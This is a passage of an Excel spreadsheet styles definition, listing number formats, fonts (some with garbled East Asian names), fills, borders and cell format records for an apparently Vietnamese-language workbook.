    <numFmt numFmtId="174" formatCode="&quot;\&quot;#,##0.00;[Red]&quot;\&quot;&quot;\&quot;&quot;\&quot;&quot;\&quot;&quot;\&quot;&quot;\&quot;\-#,##0.00"/>
    <numFmt numFmtId="175" formatCode="_-* #,##0\ _F_-;\-* #,##0\ _F_-;_-* &quot;-&quot;\ _F_-;_-@_-"/>
    <numFmt numFmtId="176" formatCode="_ * #,##0_ ;_ * \-#,##0_ ;_ * &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="177" formatCode="0.00_)"/>
    <numFmt numFmtId="178" formatCode="\(0\)"/>
    <numFmt numFmtId="179" formatCode="_(* #,##0.0_);_(* \(#,##0.0\);_(* &quot;-&quot;??_);_(@_)"/>
    <numFmt numFmtId="180" formatCode="#,##0.0000"/>
  </numFmts>
  <fonts count="34">
    <font>
      <sz val="10"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="MS Sans Serif"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="VNbook-Antiqua"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="16"/>
      <name val="Helv"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="뼻뮝"/>
      <family val="3"/>
      <charset val="129"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="바탕체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="뼻뮝"/>
      <family val="1"/>
      <charset val="129"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="新細明體"/>
      <charset val="136"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Courier"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="바탕체"/>
      <family val="1"/>
      <charset val="129"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="굴림체"/>
      <family val="3"/>
      <charset val="129"/>
    </font>
    <font>
      <sz val="10"/>
      <name val=" "/>
      <family val="1"/>
      <charset val="136"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val=".VnTime"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color indexed="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <color indexed="81"/>
      <name val="Tahoma"/>
      <family val="2"/>
      <charset val="163"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color indexed="81"/>
      <name val="Tahoma"/>
      <family val="2"/>
      <charset val="163"/>
    </font>
    <font>
      <sz val="9"/>
      <color indexed="81"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <i/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
  </fonts>
  <fills count="7">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="42"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="43"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="8"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="13"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="21">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="medium">
        <color indexed="64"/>
      </top>
      <bottom style="medium">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="thin">
        <color indexed="64"/>
      </top>
      <bottom style="thin">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="double">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right/>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diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="40">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="43" fontId="1" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="43" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="3" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="172" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="2" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="2">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="38" fontId="5" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="40" fontId="5" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="175" fontId="6" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="176" fontId="6" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" applyNumberFormat="0" applyFont="0" applyFill="0" applyAlignment="0"/>
    <xf numFmtId="177" fontId="8" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="3" applyNumberFormat="0" applyFont="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="40" fontId="9" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="38" fontId="9" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="9" fontId="10" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0"/>
    <xf numFmtId="173" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="174" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="171" fontId="15" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="170" fontId="15" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" applyProtection="0"/>
    <xf numFmtId="168" fontId="13" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="40" fontId="14" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="167" fontId="13" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="166" fontId="14" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="169" fontId="13" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
  </cellStyleXfs>
  <cellXfs count="222">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="20" fillId="2" borderId="0" xfId="33" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="33"/>
    <xf numFmtId="0" fontId="2" fillId="2" borderId="0" xfId="33" applyFill="1"/>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="4" xfId="33" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="21" fillId="4" borderId="5" xfId="33" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="5" borderId="6" xfId="33" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="4" borderId="6" xfId="33" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="4" borderId="7" xfId="33" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="8" xfId="33" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="9" xfId="33" applyFill="1" applyBorder="1"/>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="11" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="20" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="27" fillId="6" borderId="10" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="27" fillId="0" borderId="10" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="11" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="11" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="28" fillId="6" borderId="11" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="164" fontId="28" fillId="6" borderId="11" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="164" fontId="28" fillId="0" borderId="11" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="12" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="12" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="43" fontId="28" fillId="6" borderId="12" xfId="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="43" fontId="28" fillId="0" borderId="12" xfId="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="28" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="3" fontId="28" fillId="0" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="29" fillId="6" borderId="16" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="16" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="29" fillId="6" borderId="16" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="3" fontId="29" fillId="0" borderId="16" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="11" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="20" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="11" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="20" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="11" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="20" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="27" fillId="6" borderId="11" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="27" fillId="6" borderId="20" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="11" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="20" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="43" fontId="26" fillId="6" borderId="15" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="11" xfId="17" quotePrefix="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="11" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="11" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="11" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="11" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="11" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="20" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="20" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="11" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="11" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="29" fillId="6" borderId="11" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="29" fillId="6" borderId="20" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="29" fillId="6" borderId="11" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="29" fillId="6" borderId="20" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="19" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="18" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="8" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="18" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="17" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="6" borderId="17" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="17" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="26" fillId="6" borderId="17" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="17" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="26" fillId="0" borderId="17" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="4" fontId="28" fillId="0" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="28" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="0" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="0" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="4" fontId="26" fillId="0" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="29" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="0" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="0" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
